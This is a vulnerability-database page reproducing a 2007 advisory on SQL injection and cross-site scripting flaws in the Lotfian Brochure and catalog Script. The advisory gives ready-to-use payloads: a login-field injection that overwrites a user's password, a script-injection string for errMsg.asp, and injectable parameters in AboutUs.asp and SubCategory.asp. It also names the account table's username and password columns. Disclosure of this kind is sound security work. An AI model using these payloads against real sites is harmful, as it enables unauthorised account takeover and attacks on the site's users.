Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

lotfian-sqlxss.txt

🗓️ 04 Dec 2007 00:00:00Reported by The-0utl4wType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Lotfian Brochure and catalog Script SQL injection and XSS vulnerabilit

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Aria-Security Team  
http://Aria-Security.Net  
----------------------------------------  
Lotfian Brochure and cataloge Script XSS And SQL Injection   
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1135  
  
Username/Password Field can run SQL Queries,   
For Example I got these:  
  
Consumer.ConsumerID  
Consumer.ConsumerName'  
Consumer.ConsumerUserName  
Consumer.ConsumerPassword  
Consumer.Consumer  
  
Use Something like:  
'update Consumer set Consumer.ConsumerPassword='hacked' where (ConsumerID='1');--  
  
to update what you need  
  
  
[XSS]  
errMsg.asp?msg="><script>alert('Aria-Security')</script>   
  
[Other Advanced SQL Injection]  
  
* AboutUs.asp?id=-1'  
Unclosed quotation mark? use it.  
*SubCategory.asp?ID=-1'  
Unclosed quotation mark? use it.  
  
HINT: suppose the first column name is a.BrochureName  
  
Credits Goes to Aria-Security Team  
Regards,  
The-0utl4w  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
04 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
aria-securitysql injectionxssusername/password fieldcatalog scriptbrochure scriptconsumer tableupdate queryerrmsg.aspaboutus.aspsubcategory.aspadvanced sql injection
19
.json
Report